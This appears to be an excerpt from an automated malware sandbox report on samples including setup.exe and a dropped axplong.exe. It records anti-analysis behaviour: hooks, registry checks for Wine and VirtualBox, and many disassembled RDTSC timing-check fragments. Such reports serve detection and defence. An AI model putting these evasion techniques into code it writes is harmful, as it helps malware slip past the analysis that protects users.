Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe API/Special instruction interceptor: Address: 7FF8C88ED584
Source: C:\Users\user\AppData\Roaming\wsjctfw API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\AppData\Roaming\wsjctfw API/Special instruction interceptor: Address: 7FF8C88ED584
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\setup.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wsjctfw, 0000000A.00000002.3041841696.000000000247E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 7CF1E2 second address: 7CEA92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007FBA24820DA5h 0x00000010 jmp 00007FBA24820D9Fh 0x00000015 nop 0x00000016 jmp 00007FBA24820DA7h 0x0000001b push dword ptr [ebp+122D1685h] 0x00000021 jno 00007FBA24820D9Ch 0x00000027 call dword ptr [ebp+122D389Ah] 0x0000002d pushad 0x0000002e jns 00007FBA24820DADh 0x00000034 xor eax, eax 0x00000036 add dword ptr [ebp+122D1A4Ch], ecx 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 pushad 0x00000041 mov dword ptr [ebp+122D1EFAh], edi 0x00000047 popad 0x00000048 mov dword ptr [ebp+122D29CCh], eax 0x0000004e js 00007FBA24820DA2h 0x00000054 js 00007FBA24820D9Ch 0x0000005a sub dword ptr [ebp+122D1D98h], esi 0x00000060 sub dword ptr [ebp+122D1F2Ch], ecx 0x00000066 mov esi, 0000003Ch 0x0000006b cld 0x0000006c add esi, dword ptr [esp+24h] 0x00000070 mov dword ptr [ebp+122D1A4Ch], esi 0x00000076 lodsw 0x00000078 jmp 00007FBA24820DA8h 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 clc 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 stc 0x00000087 push eax 0x00000088 push esi 0x00000089 push eax 0x0000008a push edx 0x0000008b pushad 0x0000008c popad 0x0000008d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 7CEA92 second address: 7CEA96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9426FE second address: 94270E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FBA24820D96h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 94270E second address: 942718 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBA2516CD46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 942859 second address: 942862 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 942862 second address: 942868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 942868 second address: 94286D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 942C31 second address: 942C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 js 00007FBA2516CD46h 0x0000000b jl 00007FBA2516CD46h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jmp 00007FBA2516CD4Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FBA2516CD56h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 942C69 second address: 942C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 942C6D second address: 942C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 945CC9 second address: 945CDB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBA24820D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FBA24820D96h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 945CDB second address: 945D9B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D381Dh], ebx 0x00000014 push 00000000h 0x00000016 mov esi, dword ptr [ebp+122D2838h] 0x0000001c push AC4A6A3Fh 0x00000021 jg 00007FBA2516CD57h 0x00000027 jmp 00007FBA2516CD51h 0x0000002c add dword ptr [esp], 53B59641h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FBA2516CD48h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d stc 0x0000004e push 00000003h 0x00000050 jmp 00007FBA2516CD55h 0x00000055 push 00000000h 0x00000057 xor dword ptr [ebp+122D1F2Ch], edx 0x0000005d push 00000003h 0x0000005f mov ecx, dword ptr [ebp+122D28F4h] 0x00000065 push D4A09635h 0x0000006a push esi 0x0000006b jmp 00007FBA2516CD54h 0x00000070 pop esi 0x00000071 xor dword ptr [esp], 14A09635h 0x00000078 mov edi, dword ptr [ebp+122D2940h] 0x0000007e lea ebx, dword ptr [ebp+1244AB95h] 0x00000084 sub cl, 0000002Ah 0x00000087 xchg eax, ebx 0x00000088 push eax 0x00000089 push edx 0x0000008a push eax 0x0000008b push edx 0x0000008c pushad 0x0000008d popad 0x0000008e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 945D9B second address: 945D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 945D9F second address: 945DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 945EC0 second address: 945EC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 945EC4 second address: 945EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b je 00007FBA2516CD52h 0x00000011 jo 00007FBA2516CD4Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 945EDD second address: 945EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [eax] 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FBA24820D96h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 945EEC second address: 945F14 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBA2516CD54h 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 je 00007FBA2516CD54h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 945F14 second address: 945F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 945F1A second address: 945F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dl, bh 0x00000008 push 00000003h 0x0000000a push 00000000h 0x0000000c mov edx, 3EB584ABh 0x00000011 jo 00007FBA2516CD5Fh 0x00000017 call 00007FBA2516CD56h 0x0000001c push esi 0x0000001d pop esi 0x0000001e pop edx 0x0000001f push 00000003h 0x00000021 push 83C34CDFh 0x00000026 pushad 0x00000027 jmp 00007FBA2516CD4Fh 0x0000002c push eax 0x0000002d push edx 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 945F65 second address: 945FAC instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBA24820D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 3C3CB321h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FBA24820D98h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c lea ebx, dword ptr [ebp+1244AB9Eh] 0x00000032 mov esi, dword ptr [ebp+122D2944h] 0x00000038 xchg eax, ebx 0x00000039 push ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c jno 00007FBA24820D96h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 94602D second address: 94603E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 94603E second address: 946042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 946042 second address: 94608C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edi 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FBA2516CD48h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov edi, 52B5CB0Fh 0x0000002f push 00000000h 0x00000031 mov di, 8D13h 0x00000035 call 00007FBA2516CD49h 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 94608C second address: 946090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 946090 second address: 946096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 946096 second address: 946103 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FBA24820D96h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ebx 0x00000010 jp 00007FBA24820D98h 0x00000016 pushad 0x00000017 popad 0x00000018 pop ebx 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jns 00007FBA24820DACh 0x00000023 mov eax, dword ptr [eax] 0x00000025 pushad 0x00000026 jmp 00007FBA24820D9Eh 0x0000002b jmp 00007FBA24820DA9h 0x00000030 popad 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 push ecx 0x00000039 pop ecx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 946103 second address: 946107 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 966FA1 second address: 966FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 966FA7 second address: 966FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBA2516CD46h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 966FB2 second address: 966FD1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBA24820DA5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 96531D second address: 96534D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBA2516CD4Ch 0x00000008 push edx 0x00000009 jmp 00007FBA2516CD52h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007FBA2516CD48h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 965495 second address: 965499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 965499 second address: 9654C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Eh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 jp 00007FBA2516CD46h 0x00000019 je 00007FBA2516CD46h 0x0000001f pop edi 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9654C5 second address: 9654D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA24820D9Eh 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9658B4 second address: 9658B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 965D11 second address: 965D15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 965D15 second address: 965D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBA2516CD4Dh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 965EA9 second address: 965EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 965EAD second address: 965EB9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jne 00007FBA2516CD46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 95BEED second address: 95BEF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 95BEF5 second address: 95BEFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 95BEFB second address: 95BEFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 95BEFF second address: 95BF26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Fh 0x00000007 jbe 00007FBA2516CD46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007FBA2516CD46h 0x00000017 jnp 00007FBA2516CD46h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 93096E second address: 930985 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FBA24820D9Dh 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 930985 second address: 930989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 930989 second address: 930997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 930997 second address: 93099B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 93099B second address: 93099F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 93099F second address: 9309A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9309A5 second address: 9309AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9309AB second address: 9309AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9309AF second address: 9309B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9309B5 second address: 9309C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007FBA2516CD46h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9668BE second address: 9668C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9668C3 second address: 9668D6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBA2516CD4Eh 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9668D6 second address: 9668DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 96A0C6 second address: 96A0D8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FBA2516CD48h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9375B2 second address: 9375B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 96C36F second address: 96C375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 972430 second address: 972436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 971965 second address: 97196C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97200B second address: 972024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 jmp 00007FBA24820D9Fh 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 973771 second address: 973775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97383F second address: 973855 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 973855 second address: 97388B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBA2516CD48h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FBA2516CD57h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBA2516CD4Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97388B second address: 9738AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA24820DA2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9738AA second address: 9738B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9738B1 second address: 973904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FBA24820D98h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 add dword ptr [ebp+122D1F2Ch], ecx 0x00000028 sub si, F48Bh 0x0000002d call 00007FBA24820D99h 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FBA24820DA1h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 973A48 second address: 973A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 973EA4 second address: 973EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97436E second address: 974372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 974372 second address: 974376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9743F7 second address: 97440E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBA2516CD48h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FBA2516CD46h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97440E second address: 974425 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 974506 second address: 97451B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA2516CD50h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97467D second address: 974687 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBA24820D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 974687 second address: 9746A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA2516CD55h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 974981 second address: 974987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 974987 second address: 97498B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
